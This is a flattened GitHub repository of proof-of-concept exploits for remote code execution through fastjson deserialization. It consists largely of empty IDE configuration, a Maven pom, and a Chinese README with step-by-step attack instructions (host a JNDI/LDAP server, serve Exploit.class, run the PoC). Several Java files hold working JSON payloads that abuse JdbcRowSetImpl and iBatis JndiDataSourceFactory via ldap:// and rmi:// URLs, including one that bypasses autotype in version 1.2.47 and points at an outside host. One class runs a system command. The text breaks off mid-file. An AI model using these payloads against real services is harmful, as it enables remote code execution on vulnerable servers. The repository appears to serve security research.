├── .idea ├── compiler.xml ├── copyright │ └── profiles_settings.xml ├── libraries │ ├── Maven__com_alibaba_fastjson_1_2_24.xml │ ├── Maven__com_unboundid_unboundid_ldapsdk_3_1_1.xml │ ├── Maven__commons_codec_commons_codec_1_10.xml │ ├── Maven__commons_io_commons_io_2_3.xml │ ├── Maven__commons_logging_commons_logging_1_2.xml │ ├── Maven__org_apache_xbean_xbean_naming_4_5.xml │ ├── Maven__org_springframework_spring_aop_4_3_7_RELEASE.xml │ ├── Maven__org_springframework_spring_beans_4_3_7_RELEASE.xml │ ├── Maven__org_springframework_spring_context_4_3_7_RELEASE.xml │ ├── Maven__org_springframework_spring_core_4_3_7_RELEASE.xml │ ├── Maven__org_springframework_spring_expression_4_3_7_RELEASE.xml │ ├── Maven__xalan_serializer_2_7_2.xml │ ├── Maven__xalan_xalan_2_7_2.xml │ └── Maven__xml_apis_xml_apis_1_3_04.xml ├── misc.xml ├── modules.xml ├── uiDesigner.xml ├── vcs.xml └── workspace.xml ├── Java_JSON反序列化之殇_看雪安全开发者峰会.pdf ├── README.md ├── myPerson.txt ├── pom.xml ├── src └── main │ └── java │ └── person │ ├── Bypass1247.java │ ├── Exploit1.java │ ├── IbatisDatasourcePoC.java │ ├── IbatisJNDIPoC.java │ ├── JdbcRowSetImplPoc.java │ ├── OtherPoC.java │ ├── Person.java │ ├── Poc.java │ ├── Poc1.java │ ├── SerializeToFlatFile.java │ ├── Test.java │ ├── Test1.java │ ├── TestFastjson.java │ ├── TestJNDI.java │ └── server │ ├── JNDIServer.java │ └── LdapServer.java ├── target ├── classes │ └── person │ │ ├── Exploit1.class │ │ ├── JdbcRowSetImplPoc.class │ │ ├── Person.class │ │ ├── Poc.class │ │ ├── Poc1.class │ │ ├── SerializeToFlatFile.class │ │ ├── Test.class │ │ ├── Test1.class │ │ ├── TestFastjson.class │ │ ├── TestJNDI.class │ │ └── server │ │ ├── JNDIServer.class │ │ ├── LdapServer$OperationInterceptor.class │ │ └── LdapServer.class ├── fastjson-poc-1.0-SNAPSHOT-jar-with-dependencies.jar ├── fastjson-poc-1.0-SNAPSHOT.jar ├── maven-archiver │ └── pom.properties └── maven-status │ └── maven-compiler-plugin │ └── compile │ └── default-compile │ ├── createdFiles.lst │ 
└── inputFiles.lst └── test.iml /.idea/compiler.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /.idea/copyright/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__com_alibaba_fastjson_1_2_24.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__com_unboundid_unboundid_ldapsdk_3_1_1.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__commons_codec_commons_codec_1_10.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__commons_io_commons_io_2_3.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__commons_logging_commons_logging_1_2.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- 
/.idea/libraries/Maven__org_apache_xbean_xbean_naming_4_5.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__org_springframework_spring_aop_4_3_7_RELEASE.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__org_springframework_spring_beans_4_3_7_RELEASE.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__org_springframework_spring_context_4_3_7_RELEASE.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__org_springframework_spring_core_4_3_7_RELEASE.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__org_springframework_spring_expression_4_3_7_RELEASE.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__xalan_serializer_2_7_2.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 
-------------------------------------------------------------------------------- /.idea/libraries/Maven__xalan_xalan_2_7_2.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__xml_apis_xml_apis_1_3_04.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/uiDesigner.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | -------------------------------------------------------------------------------- /.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 
-------------------------------------------------------------------------------- /.idea/workspace.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 46 | 47 | 57 | 58 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 183 | 184 | 185 | 187 | 188 | 191 | 192 | 193 | 214 | 215 | 216 | 217 | 218 | true 219 | DEFINITION_ORDER 220 | 221 | 222 | 227 | 228 | 229 | 230 | 231 | 232 | 235 | 236 | 239 | 240 | 241 | 242 | 243 | 248 | 249 | 250 | 251 | 252 | 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | 267 | 268 | 269 | 270 | 273 | 274 | 277 | 278 | 279 | 280 | 283 | 284 | 287 | 288 | 291 | 292 | 295 | 296 | 299 | 300 | 303 | 304 | 305 | 306 | 309 | 310 | 313 | 314 | 317 | 318 | 321 | 322 | 325 | 326 | 329 | 330 | 333 | 334 | 335 | 336 | 337 | 338 | 339 | 340 | 341 | 342 | 343 | 344 | 345 | 346 | 347 | 348 | 349 | 350 | 351 | 352 | 353 | 354 | 355 | 356 | 357 | 358 | 359 | 360 | 361 | 364 | 365 | 378 | 379 | 380 | 381 | 384 | 385 | 398 | 399 | 400 | 401 | 404 | 405 | 418 | 419 | 420 | 421 | 424 | 425 | 438 | 439 | 440 | 441 | 444 | 445 | 458 | 459 | 460 | 465 | 466 | 473 | 474 | 475 | 488 | 489 | 490 | 491 | 
496 | 510 | 511 | 512 | 513 | 514 | 515 | 516 | 517 | 522 | 540 | 547 | 548 | 549 | 550 | 551 | 552 | 569 | 570 | 591 | 604 | 605 | 614 | 618 | 619 | 620 | 627 | 630 | 632 | 633 | 634 | 635 | 636 | 637 | 638 | 639 | 640 | 641 | 642 | 643 | 644 | 645 | 646 | 647 | 661 | 662 | 663 | 664 | 665 | 666 | 667 | 668 | 669 | 670 | 671 | 672 | 686 | 687 | 688 | 689 | 690 | 691 | 692 | 693 | 694 | 695 | 696 | 697 | 708 | 709 | 710 | 720 | 721 | 722 | 739 | 740 | 741 | 742 | 743 | 750 | 751 | 752 | 753 | 754 | 755 | 756 | 757 | 758 | 759 | 777 | 784 | 785 | project 786 | 787 | 788 | 789 | 790 | 791 | 792 | 793 | 794 | 795 | 796 | 797 | 798 | 799 | 800 | 801 | 802 | 803 | 804 | 805 | 806 | 807 | 808 | 809 | 810 | 811 | 812 | 813 | 814 | 815 | 816 | 817 | 818 | 819 | 820 | 821 | 822 | 823 | 824 | 826 | 827 | 829 | 830 | 831 | 832 | 833 | 834 | 835 | 1492528164221 836 | 862 | 863 | 864 | 865 | 867 | 868 | 869 | 870 | 871 | 872 | 873 | 874 | 875 | 876 | 877 | 878 | 879 | 880 | 881 | 882 | 883 | 884 | 885 | 886 | 887 | 888 | 889 | 890 | 891 | 892 | 893 | 894 | 895 | 896 | 897 | 898 | 899 | 900 | 901 | 902 | 903 | 904 | 905 | 906 | 907 | 908 | 910 | 911 | 914 | 917 | 918 | 919 | 921 | 922 | 923 | 924 | 925 | file://$PROJECT_DIR$/src/main/java/person/SerializeToFlatFile.java 926 | 41 927 | 928 | 929 | 930 | jar://C:/Program Files/Java/jdk1.8.0_102/src.zip!/com/sun/org/apache/xalan/internal/xsltc/trax/TemplatesImpl.java 931 | 485 932 | 933 | 935 | 936 | jar://$MAVEN_REPOSITORY$/com/alibaba/fastjson/1.2.24/fastjson-1.2.24-sources.jar!/com/alibaba/fastjson/parser/deserializer/FieldDeserializer.java 937 | 84 938 | 939 | 941 | 942 | jar://C:/Program Files/Java/jdk1.8.0_102/src.zip!/com/sun/org/apache/xalan/internal/xsltc/trax/TemplatesImpl.java 943 | 506 944 | 945 | 947 | 948 | jar://$MAVEN_REPOSITORY$/com/alibaba/fastjson/1.2.24/fastjson-1.2.24-sources.jar!/com/alibaba/fastjson/util/JavaBeanInfo.java 949 | 129 950 | 951 | 953 | 954 | 
jar://$MAVEN_REPOSITORY$/com/alibaba/fastjson/1.2.24/fastjson-1.2.24-sources.jar!/com/alibaba/fastjson/util/JavaBeanInfo.java 955 | 209 956 | 957 | 959 | 960 | jar://$MAVEN_REPOSITORY$/com/alibaba/fastjson/1.2.24/fastjson-1.2.24-sources.jar!/com/alibaba/fastjson/parser/ParserConfig.java 961 | 590 962 | 963 | 965 | 966 | jar://$MAVEN_REPOSITORY$/com/alibaba/fastjson/1.2.24/fastjson-1.2.24-sources.jar!/com/alibaba/fastjson/util/JavaBeanInfo.java 967 | 537 968 | 969 | 971 | 972 | jar://$MAVEN_REPOSITORY$/com/alibaba/fastjson/1.2.33/fastjson-1.2.33-sources.jar!/com/alibaba/fastjson/parser/deserializer/FieldDeserializer.java 973 | 54 974 | 975 | 977 | 978 | jar://$MAVEN_REPOSITORY$/com/alibaba/fastjson/1.2.24/fastjson-1.2.24-sources.jar!/com/alibaba/fastjson/util/JavaBeanInfo.java 979 | 136 980 | 981 | 983 | 984 | file://$PROJECT_DIR$/src/main/java/person/Poc1.java 985 | 60 986 | 987 | 989 | 990 | jar://$MAVEN_REPOSITORY$/com/alibaba/fastjson/1.2.24/fastjson-1.2.24-sources.jar!/com/alibaba/fastjson/JSON.java 991 | 636 992 | 993 | 995 | 996 | jar://C:/Program Files/Java/jdk1.8.0_102/jre/lib/rt.jar!/com/sun/rowset/JdbcRowSetImpl.class 997 | 326 998 | 999 | 1001 | 1002 | file://$PROJECT_DIR$/src/main/java/person/TestJNDI.java 1003 | 40 1004 | 1005 | 1007 | 1008 | file://$PROJECT_DIR$/src/main/java/person/server/LdapServer.java 1009 | 84 1010 | 1011 | 1013 | 1014 | file://$PROJECT_DIR$/src/main/java/person/server/LdapServer.java 1015 | 98 1016 | 1017 | 1019 | 1020 | jar://$MAVEN_REPOSITORY$/com/unboundid/unboundid-ldapsdk/3.1.1/unboundid-ldapsdk-3.1.1.jar!/com/unboundid/ldap/listener/LDAPListenerClientConnection.class 1021 | 372 1022 | 1023 | 1025 | 1026 | jar://$MAVEN_REPOSITORY$/com/unboundid/unboundid-ldapsdk/3.1.1/unboundid-ldapsdk-3.1.1.jar!/com/unboundid/ldap/listener/LDAPListenerClientConnection.class 1027 | 323 1028 | 1029 | 1031 | 1032 | 
jar://$MAVEN_REPOSITORY$/com/unboundid/unboundid-ldapsdk/3.1.1/unboundid-ldapsdk-3.1.1.jar!/com/unboundid/ldap/listener/LDAPListenerClientConnection.class 1033 | 267 1034 | 1035 | 1037 | 1038 | file://$PROJECT_DIR$/src/main/java/person/TestJNDI.java 1039 | 35 1040 | 1041 | 1043 | 1044 | file://$PROJECT_DIR$/src/main/java/person/Poc.java 1045 | 37 1046 | 1047 | 1049 | 1050 | file://$PROJECT_DIR$/src/main/java/person/server/LdapServer.java 1051 | 109 1052 | 1053 | 1055 | 1056 | jar://C:/Program Files/Java/jdk1.8.0_102/src.zip!/com/sun/org/apache/xalan/internal/xsltc/trax/TemplatesImpl.java 1057 | 70 1058 | 1059 | 1061 | 1062 | jar://C:/Program Files/Java/jdk1.8.0_102/src.zip!/com/sun/org/apache/xalan/internal/xsltc/trax/TemplatesImpl.java 1063 | 57 1064 | 1065 | 1067 | 1068 | jar://C:/Program Files/Java/jdk1.8.0_102/src.zip!/com/sun/org/apache/xalan/internal/xsltc/trax/TemplatesImpl.java 1069 | 227 1070 | 1071 | 1073 | 1074 | 1075 | 1076 | 1077 | 1079 | 1080 | 1081 | 1082 | 1085 | 1086 | 1087 | 1088 | 1089 | 1090 | 1091 | 1092 | 1093 | 1094 | 1095 | 1096 | 1097 | 1098 | 1099 | 1100 | 1101 | 1102 | 1103 | 1104 | 1105 | 1106 | 1107 | 1108 | 1109 | 1110 | 1111 | 1112 | 1113 | 1114 | 1115 | 1116 | 1117 | 1118 | 1119 | 1120 | 1121 | 1122 | 1123 | 1124 | 1125 | 1126 | 1127 | 1128 | 1129 | 1130 | 1131 | 1132 | 1133 | 1134 | 1135 | 1136 | 1137 | 1138 | 1139 | 1140 | 1141 | 1142 | 1143 | 1144 | 1145 | 1146 | 1147 | 1148 | 1149 | 1150 | 1151 | 1152 | 1153 | 1154 | 1155 | 1156 | 1157 | 1158 | 1159 | 1160 | 1161 | 1162 | 1163 | 1164 | 1165 | 1166 | 1167 | 1168 | 1169 | 1170 | 1171 | 1172 | 1173 | 1174 | 1175 | 1176 | 1177 | 1178 | 1179 | 1180 | 1181 | 1182 | 1183 | 1184 | 1185 | 1186 | 1187 | 1188 | 1189 | 1190 | 1191 | 1192 | 1193 | 1194 | 1195 | 1196 | 1197 | 1198 | 1199 | 1200 | 1201 | 1202 | 1203 | 1204 | 1205 | 1206 | 1207 | 1208 | 1209 | 1210 | 1211 | 1212 | 1213 | 1214 | 1215 | 1216 | 1217 | 1218 | 1219 | 1220 | 1221 | 1222 | 1223 | 1224 | 1225 | 1226 | 1227 | 1228 | 1229 
| 1230 | 1231 | 1232 | 1233 | 1234 | 1235 | 1236 | 1237 | 1238 | 1239 | 1240 | 1241 | 1242 | 1243 | 1244 | 1245 | 1246 | 1247 | 1248 | 1249 | 1250 | 1251 | 1252 | 1253 | 1254 | 1255 | 1256 | 1257 | 1258 | 1259 | 1260 | 1261 | 1262 | 1263 | 1264 | 1265 | 1266 | 1267 | 1268 | 1269 | 1270 | 1271 | 1272 | 1273 | 1274 | 1275 | 1276 | 1277 | 1278 | 1279 | 1280 | 1281 | 1282 | 1283 | 1284 | 1285 | 1286 | 1287 | 1288 | 1289 | 1290 | 1291 | 1292 | 1293 | 1294 | 1295 | 1296 | 1297 | 1298 | 1299 | 1300 | 1301 | 1302 | 1303 | 1304 | JAVA 1305 | javax.xml.transform.Templates 1306 | 1307 | javax.xml.transform.Templates 1308 | 1309 | 1310 | 1311 | 1312 | 1313 | 1314 | All 1315 | private 1316 | 1317 | 1318 | 1319 | 1320 | 1321 | 1322 | JAVA 1323 | com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl 1324 | 1325 | javax.xml.transform.Templates 1326 | com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl 1327 | java.io.Serializable 1328 | 1329 | 1330 | 1331 | 1332 | 1333 | 1334 | Constructors 1335 | Properties 1336 | Methods 1337 | 1338 | All 1339 | private 1340 | 1341 | 1342 | 1343 | 1344 | 1345 | 1346 | 1347 | 1348 | 1349 | 1350 | 1351 | 1352 | 1353 | 1354 | 1355 | 1356 | 1357 | 1358 | 1359 | 1360 | 1361 | 1362 | 1363 | 1364 | 1365 | 1366 | 1367 | 1368 | 1369 | 1370 | 1371 | 1372 | 1373 | 1374 | 1375 | 1376 | 1377 | 1378 | 1379 | 1380 | 1381 | 1382 | 1383 | 1384 | 1385 | 1386 | 1387 | 1388 | 1389 | 1390 | 1391 | 1392 | 1393 | 1394 | 1395 | 1396 | 1397 | 1398 | 1399 | 1400 | 1401 | 1402 | 1403 | 1404 | 1405 | 1406 | 1407 | 1408 | 1409 | 1410 | 1411 | 1412 | 1413 | 1414 | 1415 | 1416 | 1417 | 1418 | 1419 | 1420 | 1421 | 1422 | 1423 | 1424 | 1425 | 1426 | 1427 | 1428 | 1429 | 1430 | 1431 | 1432 | 1433 | 1434 | 1435 | 1436 | 1437 | 1438 | 1439 | 1440 | 1441 | 1442 | 1443 | 1444 | 1445 | 1446 | 1447 | 1448 | 1449 | 1450 | 1451 | 1452 | 1453 | 1454 | 1455 | 1456 | 1457 | 1458 | 1459 | 1460 | 1461 | 1462 | 1463 | 1464 | 1465 | 1466 | 1467 | 1468 | 1469 | 1470 | 1471 | 1472 | 
1473 | 1474 | 1475 | 1476 | 1477 | 1478 | 1479 | 1480 | 1481 | 1482 | 1483 | 1484 | 1485 | 1486 | 1487 | 1488 | 1489 | 1490 | 1491 | 1492 | 1493 | 1494 | 1495 | 1496 | 1497 | 1498 | 1499 | 1500 | 1501 | 1502 | 1503 | 1504 | 1505 | 1506 | 1507 | 1508 | 1509 | 1510 | 1511 | 1512 | 1513 | 1514 | 1515 | 1516 | 1517 | 1518 | 1519 | 1520 | 1521 | 1522 | 1523 | 1524 | 1525 | 1526 | 1527 | 1528 | 1529 | 1530 | 1531 | 1532 | 1533 | 1534 | 1535 | 1536 | 1537 | 1538 | 1539 | 1540 | 1541 | 1542 | 1543 | 1544 | 1545 | 1550 | 1551 | 1552 | 1553 | 1554 | 1555 | No facets are configured 1556 | 1557 | 1562 | 1563 | 1564 | 1565 | 1566 | 1567 | 1568 | 1573 | 1574 | 1575 | 1576 | 1577 | 1578 | 1.8 1579 | 1580 | 1585 | 1586 | 1587 | 1588 | 1589 | 1590 | test 1591 | 1592 | 1598 | 1599 | 1600 | 1601 | 1602 | 1603 | 1.8 1604 | 1605 | 1610 | 1611 | 1612 | 1613 | 1614 | 1615 | Maven: com.alibaba:fastjson:1.2.24 1616 | 1617 | 1622 | 1623 | 1624 | 1625 | 1626 | 1627 | 1628 | 1631 | -------------------------------------------------------------------------------- /Java_JSON反序列化之殇_看雪安全开发者峰会.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/Java_JSON反序列化之殇_看雪安全开发者峰会.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | fastjson remote code execute poc 2 | 直接用intellij IDEA打开即可 3 | 首先编译得到Test.class,然后运行Poc.java 4 | 5 | 支持jdk1.7,1.8 6 | 该poc只能运行在fastjson-1.2.22到fastjson-1.2.24版本区间,因为fastjson从1.2.22版本才开始引入SupportNonPublicField 7 | 8 | 详情分析:http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/ 9 | 基于JdbcRowSetImpl的Fastjson RCE 
PoC构造与分析:http://xxlegend.com/2017/12/06/%E5%9F%BA%E4%BA%8EJdbcRowSetImpl%E7%9A%84Fastjson%20RCE%20PoC%E6%9E%84%E9%80%A0%E4%B8%8E%E5%88%86%E6%9E%90/ 10 | 其他参考:http://xxlegend.com/2017/11/23/Java%20JSON%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8B%E6%AE%87-%E7%9C%8B%E9%9B%AA%E5%AE%89%E5%85%A8%E5%BC%80%E5%8F%91%E8%80%85%E5%B3%B0%E4%BC%9A/ 11 | 12 | 基于JNDI的poc,JdbcRowSetImplPoc.java 13 | 14 | 1,在远程服务器上运行server中的JNDIServer或者LdapServer 15 | 2,将Exploit.class放到上述服务指定的位置,一般都是web服务目录下 16 | 3,执行JdbcRowSetImplPoc.java 17 | 18 | 19 | ## 注意事项: 20 | 启动JNDIServer或者LdapServer的时候 factoryLocation 一定得是ip后带斜杠,这个斜杠少不得,少了的话到web服务器的请求就变成了GET / 而不是正常的GET /Exploit.class,正常的示例如下: 21 | 224.206.180.18 - - [07/Dec/2017:02:11:15 -0500] "GET /Exploit.class HTTP/1.1" 200 860 "-" "Java/1.8.0_102" 22 | 23 | -------------------------------------------------------------------------------- /myPerson.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/myPerson.txt -------------------------------------------------------------------------------- /pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | com.xxlengend 8 | fastjson-poc 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 13 | 14 | org.apache.maven.plugins 15 | maven-assembly-plugin 16 | 2.5.5 17 | 18 | 24 | 25 | jar-with-dependencies 26 | 27 | 28 | 29 | 30 | make-assembly 31 | package 32 | 33 | single 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | commons-codec 44 | commons-codec 45 | 1.10 46 | 47 | 48 | 49 | com.alibaba 50 | fastjson 51 | 1.2.24 52 | 53 | 54 | com.unboundid 55 | unboundid-ldapsdk 56 | 3.1.1 57 | 58 | 59 | 60 | commons-io 61 | commons-io 62 | 2.3 63 | 64 | 65 | xalan 66 | xalan 67 | 2.7.2 68 | 69 | 70 | 71 | 72 | org.springframework 73 | spring-beans 74 | 4.3.7.RELEASE 75 | 76 | 77 | 78 | org.springframework 79 | spring-context 80 | 
4.3.7.RELEASE 81 | 82 | 83 | 84 | org.springframework 85 | spring-aop 86 | 4.3.7.RELEASE 87 | 88 | 89 | 90 | org.apache.xbean 91 | xbean-naming 92 | 4.5 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | -------------------------------------------------------------------------------- /src/main/java/person/Bypass1247.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | 5 | /** 6 | * Created on 2019-07-21 7 | * 用于bypass 1.2.47,适用于低于1.2.48的版本,此poc绕过了fastjson的autotype机制,无需开启autotype,直接一招毙命 8 | */ 9 | public class Bypass1247 { 10 | public static void main(String[] args){ 11 | String payload = "{\"cache\":{\"@type\":\"java.lang.Class\",\"val\":\"L\u0063om.sun.rowset.JdbcRowSetImpl;\"}," 12 | + "\"value\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," 13 | + "\"dataSourceName\":\"ldap://xxlegend.com/Exploit1\",\"autoCommit\":true}}"; 14 | JSON.parseObject(payload, Object.class); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /src/main/java/person/Exploit1.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | /** 4 | * Created by liaoxinxi on 2017-9-4. 
5 | */ 6 | public class Exploit1 { 7 | public Exploit1(){ 8 | try{ 9 | Runtime.getRuntime().exec("calc"); 10 | }catch(Exception e){ 11 | e.printStackTrace(); 12 | } 13 | } 14 | public static void main(String[] argv){ 15 | Exploit1 e = new Exploit1(); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /src/main/java/person/IbatisDatasourcePoC.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import com.alibaba.fastjson.parser.ParserConfig; 5 | 6 | 7 | public class IbatisDatasourcePoC { 8 | public static void main(String[] argv) { 9 | //testUnicode(); 10 | testJndiDataSourceFactory(); 11 | } 12 | 13 | public static void testJndiDataSourceFactory() { 14 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true); 15 | //fastjson 1.2.45 bypass,https://github.com/alibaba/fastjson/releases/tag/1.2.45 16 | String payload = "{\"@type\":\"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory\",\"properties\":{\"data_source\":\"rmi://localhost:1099/Exploit\"}}"; 17 | JSON.parse(payload); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /src/main/java/person/IbatisJNDIPoC.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import com.alibaba.fastjson.parser.ParserConfig; 5 | 6 | /** 7 | * Created by liaoxinxi on 2018-4-24. 
8 | */ 9 | public class IbatisJNDIPoC { 10 | public static void main(String[] argv) { 11 | //testUnicode(); 12 | testJndiDataSourceFactory(); 13 | } 14 | 15 | public static void testJndiDataSourceFactory() { 16 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true); 17 | String payload = "{\"@type\":\"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory\",\"properties\":{\"data_source\":\"rmi://localhost:1099/Exploit\"}}"; 18 | JSON.parse(payload); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /src/main/java/person/JdbcRowSetImplPoc.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | 5 | /** 6 | * Created by liaoxinxi on 2017-9-4. 7 | */ 8 | public class JdbcRowSetImplPoc { 9 | public static void main(String[] argv){ 10 | testJdbcRowSetImpl(); 11 | } 12 | public static void testJdbcRowSetImpl(){ 13 | String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:389/Exploit\"," + 14 | " \"autoCommit\":true}"; 15 | /* String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\"," + 16 | " \"autoCommit\":true}";*/ 17 | JSON.parse(payload); 18 | } 19 | 20 | } 21 | -------------------------------------------------------------------------------- /src/main/java/person/OtherPoC.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import com.alibaba.fastjson.parser.ParserConfig; 5 | 6 | /** 7 | * Created by liaoxinxi on 2018-4-24. 
